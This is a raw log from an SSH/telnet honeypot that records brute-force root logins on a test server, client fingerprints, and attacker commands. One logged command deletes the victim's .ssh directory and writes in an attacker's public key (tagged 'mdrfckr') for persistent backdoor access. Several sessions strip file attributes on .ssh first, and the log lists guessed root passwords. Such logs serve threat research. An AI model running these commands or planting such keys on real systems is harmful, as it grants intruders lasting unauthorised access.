{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:24:44.973165Z","src_ip":"43.156.5.21","session":"844e0d10ade9"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:45.227479Z","src_ip":"43.156.5.21","session":"677d11ca1acb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:24:45.228798Z","src_ip":"43.156.5.21","session":"844e0d10ade9"}
{"eventid":"cowrie.session.closed","duration":"301.1","message":"Connection lost after 301.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:29.992819Z","src_ip":"180.184.65.100","session":"65971cdbba65"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":59770,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce593a3cb926","protocol":"ssh","message":"New connection: 129.226.183.73:59770 (1.2.3.4:22) [session: ce593a3cb926]","sensor":"my-vps","timestamp":"2025-08-24T21:25:49.563763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:25:49.564789Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:25:49.827150Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.login.success","username":"root","password":"sihua@123","message":"login attempt [root/sihua@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:25:50.884041Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:25:51.424756Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:25:51.425483Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:25:51.426355Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:51.686260Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:25:52.326606Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:25:52.327511Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:25:52.581851Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:52.582819Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":60920,"dst_ip":"1.2.3.4","dst_port":22,"session":"18555ac62608","protocol":"ssh","message":"New connection: 129.226.183.73:60920 (1.2.3.4:22) [session: 18555ac62608]","sensor":"my-vps","timestamp":"2025-08-24T21:25:52.855557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:25:52.868354Z","src_ip":"129.226.183.73","session":"18555ac62608"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:25:53.141027Z","src_ip":"129.226.183.73","session":"18555ac62608"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:25:54.247977Z","src_ip":"129.226.183.73","session":"18555ac62608"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:55.526435Z","src_ip":"129.226.183.73","session":"18555ac62608"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":34020,"dst_ip":"1.2.3.4","dst_port":22,"session":"3db33d044b6c","protocol":"ssh","message":"New connection: 129.226.183.73:34020 (1.2.3.4:22) [session: 3db33d044b6c]","sensor":"my-vps","timestamp":"2025-08-24T21:25:55.806139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:25:55.807115Z","src_ip":"129.226.183.73","session":"3db33d044b6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:25:56.087018Z","src_ip":"129.226.183.73","session":"3db33d044b6c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:25:57.228079Z","src_ip":"129.226.183.73","session":"3db33d044b6c"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:57.498897Z","src_ip":"129.226.183.73","session":"ce593a3cb926"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:25:57.506644Z","src_ip":"129.226.183.73","session":"3db33d044b6c"}
{"eventid":"cowrie.session.closed","duration":"246.1","message":"Connection lost after 246.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:26:42.976796Z","src_ip":"36.26.74.162","session":"9ed558594398"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":38738,"dst_ip":"1.2.3.4","dst_port":22,"session":"011d7e63d3f6","protocol":"ssh","message":"New connection: 60.221.239.232:38738 (1.2.3.4:22) [session: 011d7e63d3f6]","sensor":"my-vps","timestamp":"2025-08-24T21:26:43.089950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:26:43.090652Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:26:43.272244Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.login.success","username":"root","password":"!P@ssw0rd","message":"login attempt [root/!P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:26:44.042550Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:26:44.424257Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:26:44.424955Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:26:44.425942Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:26:44.608376Z","src_ip":"60.221.239.232","session":"011d7e63d3f6"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":56966,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a2070d93141","protocol":"ssh","message":"New connection: 129.226.183.73:56966 (1.2.3.4:22) [session: 4a2070d93141]","sensor":"my-vps","timestamp":"2025-08-24T21:26:59.547756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:26:59.548699Z","src_ip":"129.226.183.73","session":"4a2070d93141"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:26:59.811495Z","src_ip":"129.226.183.73","session":"4a2070d93141"}
{"eventid":"cowrie.login.failed","username":"riscv","password":"123","message":"login attempt [riscv/123] failed","sensor":"my-vps","timestamp":"2025-08-24T21:27:00.899871Z","src_ip":"129.226.183.73","session":"4a2070d93141"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:27:02.178433Z","src_ip":"129.226.183.73","session":"4a2070d93141"}
{"eventid":"cowrie.session.closed","duration":"300.9","message":"Connection lost after 300.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:27:34.799246Z","src_ip":"60.221.239.232","session":"bcefa9dd593c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"f058a79f42e5","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: f058a79f42e5]","sensor":"my-vps","timestamp":"2025-08-24T21:27:51.641631Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:27:51.656333Z","src_ip":"196.251.114.29","session":"f058a79f42e5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56340,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6eeaba1646d","protocol":"ssh","message":"New connection: 217.72.205.35:56340 (1.2.3.4:22) [session: f6eeaba1646d]","sensor":"my-vps","timestamp":"2025-08-24T21:28:38.428705Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:28:38.430128Z","src_ip":"217.72.205.35","session":"f6eeaba1646d"}
{"eventid":"cowrie.session.connect","src_ip":"221.153.14.162","src_port":36827,"dst_ip":"1.2.3.4","dst_port":23,"session":"e33d14d79adc","protocol":"telnet","message":"New connection: 221.153.14.162:36827 (1.2.3.4:23) [session: e33d14d79adc]","sensor":"my-vps","timestamp":"2025-08-24T21:28:40.749142Z"}
{"eventid":"cowrie.session.closed","duration":30.456175804138184,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:29:11.205247Z","src_ip":"221.153.14.162","session":"e33d14d79adc"}
{"eventid":"cowrie.session.connect","src_ip":"81.237.212.228","src_port":60113,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb75d2866b5c","protocol":"telnet","message":"New connection: 81.237.212.228:60113 (1.2.3.4:23) [session: cb75d2866b5c]","sensor":"my-vps","timestamp":"2025-08-24T21:30:30.978886Z"}
{"eventid":"cowrie.session.closed","duration":12.36717677116394,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:30:43.345993Z","src_ip":"81.237.212.228","session":"cb75d2866b5c"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":43106,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5ed4f0b9e70","protocol":"ssh","message":"New connection: 60.221.239.232:43106 (1.2.3.4:22) [session: b5ed4f0b9e70]","sensor":"my-vps","timestamp":"2025-08-24T21:30:51.575484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:30:51.576506Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:30:51.750591Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz123wsx!@#","message":"login attempt [root/Qaz123wsx!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:30:52.487278Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:30:52.902402Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:30:52.903137Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:30:52.904189Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:30:53.080692Z","src_ip":"60.221.239.232","session":"b5ed4f0b9e70"}
{"eventid":"cowrie.session.connect","src_ip":"60.221.239.232","src_port":42724,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1dee107174a","protocol":"ssh","message":"New connection: 60.221.239.232:42724 (1.2.3.4:22) [session: e1dee107174a]","sensor":"my-vps","timestamp":"2025-08-24T21:31:05.284894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:31:05.285872Z","src_ip":"60.221.239.232","session":"e1dee107174a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:31:05.460155Z","src_ip":"60.221.239.232","session":"e1dee107174a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:31:06.197693Z","src_ip":"60.221.239.232","session":"e1dee107174a"}
